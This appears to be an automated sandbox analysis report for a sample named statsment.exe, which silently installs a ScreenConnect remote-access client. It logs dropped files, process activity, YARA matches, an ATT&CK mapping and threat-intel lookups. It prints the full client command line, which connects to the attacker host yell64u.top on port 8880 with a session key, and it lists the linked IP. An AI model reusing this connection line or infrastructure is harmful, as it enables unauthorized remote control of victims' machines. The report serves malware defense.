                              Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll
                              Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.Compression.dll
                              Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Windows\Installer\MSID756.tmp
                              Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Windows\Installer\MSID438.tmp
                              Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.Core.dll
                              Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll
                              Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe
                              Source: C:\Windows\SysWOW64\msiexec.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp
                              Source: C:\Windows\SysWOW64\rundll32.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.InstallerActions.dll
                              Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                              Source: C:\Users\user\Desktop\statsment.exe TID: 7696; Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe TID: 8100; Thread sleep count: 44 > 30
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe TID: 7424; Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Windows\SysWOW64\msiexec.exe; File Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\System32\msiexec.exe; File Volume queried: C:\ FullSizeInformation
                              Source: setup.msi.0.dr; Binary or memory string: VMCi-
                              Source: ScreenConnect.ClientService.exe, 00000007.00000002.2995999567.0000000005090000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Windows\System32\msiexec.exe; Process information queried: ProcessInformation
                              Source: C:\Users\user\Desktop\statsment.exe; Process token adjusted: Debug
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Process token adjusted: Debug
                              Source: C:\Users\user\Desktop\statsment.exe; Memory allocated: page read and write | page guard

                              HIPS / PFW / Operating System Protection Evasion

                              Source: 0.2.statsment.exe.2970000.0.raw.unpack, Program.cs; Reference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                              Source: 0.2.statsment.exe.5130000.1.raw.unpack, NativeLibrary.cs; Reference to suspicious API methods: LoadLibrary(type, assemblyTypeHint)
                              Source: 0.2.statsment.exe.51e0000.3.raw.unpack, WindowsMemoryNativeLibrary.cs; Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                              Source: 0.2.statsment.exe.51e0000.3.raw.unpack, WindowsMemoryNativeLibrary.cs; Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                              Source: 0.2.statsment.exe.51e0000.3.raw.unpack, WindowsMemoryNativeLibrary.cs; Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                              Source: 0.2.statsment.exe.51e0000.3.raw.unpack, WindowsExtensions.cs; Reference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                              Source: C:\Users\user\Desktop\statsment.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (de5851ad6e374ce3)\screenconnect.clientservice.exe" "?e=access&y=guest&h=yell64u.top&p=8880&s=882825b1-a7d4-4898-8af4-0ecb567917da&k=bgiaaackaabsu0exaagaaaeaaqdfk%2fbbpi2y%2fu64inmnualvsinhikj3qixef2eblhktkmb9wafgho8pwjl0lvyg9kgvgb%2fbbr7p8upybqqwjmt2zg9vyagxlcjy%2fd8w0%2b7tfbgg8gffcjoob3tupnzbetnvs8%2bybotmzzsmg6ijynblxj1gtcahumwr1u8jkfxsyvpzrxohbr31dmibtzi1nunryf8xa6qxsktbm1h0aqgbzr6fzuzymqekrjktwq2%2fxup3dlz4en6bz1k0onlkviz5vhj3h597ijpgkjlbhftfc4t%2btt%2bncv6zqw83iwwtzxibtxf7nmuvq0n4ff2lkmh5flu07mqw%2fy38%2b5mo41xa&c=groups&c=&c=&c=&c=&c=&c=&c="
                              Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1750694903.0000000000AD2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr; Binary or memory string: Progman
                              Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1750694903.0000000000AD2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr; Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\Users\user\Desktop\statsment.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\msiexec.exe; Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\msiexec.exe; Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.Core.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.Windows.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Code function: 9_2_00007FFD9B3F3642 CreateNamedPipeW,9_2_00007FFD9B3F3642
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Code function: 7_2_013F4D30 RtlGetVersion,7_2_013F4D30
                              Source: C:\Users\user\Desktop\statsment.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                              Lowering of HIPS / PFW / Operating System Security Settings

                              Source: C:\Windows\System32\msiexec.exe; Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages
                              Source: Yara match; File source: statsment.exe, type: SAMPLE
                              Source: Yara match; File source: 0.2.statsment.exe.5430000.9.raw.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 8.0.ScreenConnect.WindowsClient.exe.ad0000.0.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 8.2.ScreenConnect.WindowsClient.exe.2e4fa20.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 0.2.statsment.exe.5430000.9.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 0.0.statsment.exe.305db8.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 0.0.statsment.exe.2dc3d8.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 0.0.statsment.exe.2563d8.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 9.2.ScreenConnect.WindowsClient.exe.2a2fa60.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 0.0.statsment.exe.240000.0.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 00000000.00000002.1716747544.0000000005430000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: 00000008.00000000.1750694903.0000000000AD2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                              Source: Yara match; File source: 00000008.00000002.2960693212.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: 00000000.00000000.1684869140.0000000000256000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match; File source: 00000009.00000002.1800818795.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: 00000000.00000002.1698483119.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: Process Memory Space: statsment.exe PID: 7676, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 7872, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 8112, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7344, type: MEMORYSTR
                              Source: Yara match; File source: C:\Config.Msi\59d159.rbs, type: DROPPED
                              Source: Yara match; File source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, type: DROPPED
                              Source: Yara match; File source: C:\Windows\Installer\MSID418.tmp, type: DROPPED
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire Infrastructure1
                              Replication Through Removable Media
                              31
                              Windows Management Instrumentation
                              1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              11
                              Disable or Modify Tools
                              OS Credential Dumping11
                              Peripheral Device Discovery
                              Remote Services11
                              Archive Collected Data
                              2
                              Encrypted Channel
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Native API
                              1
                              DLL Search Order Hijacking
                              1
                              DLL Search Order Hijacking
                              1
                              Deobfuscate/Decode Files or Information
                              LSASS Memory1
                              File and Directory Discovery
                              Remote Desktop ProtocolData from Removable Media1
                              Non-Standard Port
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts12
                              Command and Scripting Interpreter
                              1
                              Component Object Model Hijacking
                              1
                              Component Object Model Hijacking
                              1
                              Obfuscated Files or Information
                              Security Account Manager45
                              System Information Discovery
                              SMB/Windows Admin SharesData from Network Shared Drive1
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron2
                              Windows Service
                              2
                              Windows Service
                              1
                              Software Packing
                              NTDS21
                              Security Software Discovery
                              Distributed Component Object ModelInput Capture1
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd1
                              Bootkit
                              13
                              Process Injection
                              1
                              DLL Side-Loading
                              LSA Secrets2
                              Process Discovery
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              DLL Search Order Hijacking
                              Cached Domain Credentials51
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              File Deletion
                              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job122
                              Masquerading
                              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt51
                              Virtualization/Sandbox Evasion
                              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron13
                              Process Injection
                              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                              Hidden Users
                              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                              Bootkit
                              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                              Rundll32
                              GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                              [Behavior graph: ID: 1574188, Sample: statsment.exe, Startdate: 13/12/2024, Architecture: WINDOWS, Score: 48]

                              Source | Detection | Scanner | Label | Link
                              statsment.exe | 28% | Virustotal | | Browse

                              Source | Detection | Scanner | Label | Link
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | 0% | ReversingLabs | |
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | 0% | Virustotal | | Browse
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll | 0% | ReversingLabs | |
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll | 0% | Virustotal | | Browse
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | 0% | ReversingLabs | |
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | 3% | Virustotal | | Browse
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll | 0% | ReversingLabs | |
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll | 0% | ReversingLabs | |
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dll | 0% | ReversingLabs | |
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | |
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | |
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dll | 0% | ReversingLabs | |
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | |
                              C:\Users\user\AppData\Local\Temp\MSICAFF.tmp | 0% | ReversingLabs | |
                              C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.Compression.Cab.dll | 0% | ReversingLabs | |
                              C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.Compression.dll | 0% | ReversingLabs | |
                              C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll | 0% | ReversingLabs | |
                              C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.WindowsInstaller.dll | 0% | ReversingLabs | |
                              C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.Core.dll | 0% | ReversingLabs | |
                              C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.InstallerActions.dll | 0% | ReversingLabs | |
                              C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.Windows.dll | 0% | ReversingLabs | |
                              C:\Windows\Installer\MSID438.tmp | 0% | ReversingLabs | |
                              C:\Windows\Installer\MSID756.tmp | 0% | ReversingLabs | |

                              No Antivirus matches

                              Source | Detection | Scanner | Label | Link
                              yell64u.top | 3% | Virustotal | | Browse

                              No Antivirus matches

                              Name | IP | Active | Malicious | Antivirus Detection | Reputation
                              yell64u.top | 85.239.34.190 | true | true | | unknown

                              Name | Source | Malicious | Antivirus Detection | Reputation
                              http://wixtoolset.org/releases/ | rundll32.exe, 00000004.00000003.1711832278.0000000004BBB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1712025636.00000000049B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1711832278.0000000004C2A000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | false | | high
                              http://wixtoolset.org/news/ | rundll32.exe, 00000004.00000003.1711832278.0000000004BBB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1712025636.00000000049B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1711832278.0000000004C2A000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | false | | high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ScreenConnect.ClientService.exe, 00000007.00000002.2963863424.0000000001D5A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800818795.00000000029B1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                              http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v | rundll32.exe, 00000004.00000003.1711832278.0000000004BBB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1712025636.00000000049B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1711832278.0000000004C2A000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | false | | high
                              https://feedback.screenconnect.com/Feedback.axd | ScreenConnect.Core.dll.2.dr | false | | high
                              https://docs.rs/getrandom#nodejs-es-module-support | ScreenConnect.WindowsCredentialProvider.dll.2.dr | false | | high

                                          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                          85.239.34.190 | yell64u.top | Russian Federation | | 134121 | RAINBOW-HKRainbownetworklimitedHK | true

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1574188
                                          Start date and time:2024-12-13 03:12:07 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 8m 11s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:14
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:statsment.exe
                                          Detection:MAL
                                          Classification:mal48.evad.winEXE@17/56@1/1
                                          EGA Information:
                                          • Successful, ratio: 60%
                                          HCA Information:
                                          • Successful, ratio: 66%
                                          • Number of executed functions: 337
                                          • Number of non-executed functions: 5
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target rundll32.exe, PID 7872 because it is empty
                                          • Execution Graph export aborted for target statsment.exe, PID 7676 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                          No simulations
                                          Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                          85.239.34.190 | setup.msi | malicious | ScreenConnect Tool |
                                          85.239.34.190 | statments.exe | malicious | ScreenConnect Tool |
                                          85.239.34.190 | sstatment.exe | malicious | ScreenConnect Tool |
                                                 Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                 yell64u.top | setup.msi | malicious | ScreenConnect Tool | 85.239.34.190
                                                 yell64u.top | statments.exe | malicious | ScreenConnect Tool | 85.239.34.190
                                                 yell64u.top | sstatment.exe | malicious | ScreenConnect Tool | 85.239.34.190
                                                 Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                 RAINBOW-HKRainbownetworklimitedHK | spc.elf | malicious | Unknown | 85.239.34.134
                                                 RAINBOW-HKRainbownetworklimitedHK | sh4.elf | malicious | Unknown | 85.239.34.134
                                                 RAINBOW-HKRainbownetworklimitedHK | m68k.elf | malicious | Unknown | 85.239.34.134
                                                 RAINBOW-HKRainbownetworklimitedHK | 3d#U0438.hta | malicious | Unknown | 85.239.52.118
                                                 RAINBOW-HKRainbownetworklimitedHK | m68k.elf | malicious | Mirai | 85.239.34.134
                                                 RAINBOW-HKRainbownetworklimitedHK | sh4.elf | malicious | Mirai | 85.239.34.134
                                                 RAINBOW-HKRainbownetworklimitedHK | spc.elf | malicious | Mirai | 85.239.34.134
                                                 RAINBOW-HKRainbownetworklimitedHK | x86.elf | malicious | Mirai | 85.239.34.134
                                                 RAINBOW-HKRainbownetworklimitedHK | mips.elf | malicious | Unknown | 85.239.34.134
                                                 RAINBOW-HKRainbownetworklimitedHK | 558s2.exe | malicious | RevengeRAT | 102.165.46.145
                                                No context
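                                                 Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                 C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html | malicious | ScreenConnect Tool |
                                                 C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html | malicious | ScreenConnect Tool |
                                                 C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | file.exe | malicious | ScreenConnect Tool |
                                                 C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | setup.msi | malicious | ScreenConnect Tool |
                                                 C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | monthly-eStatementForum120478962.Client.exe | malicious | ScreenConnect Tool |
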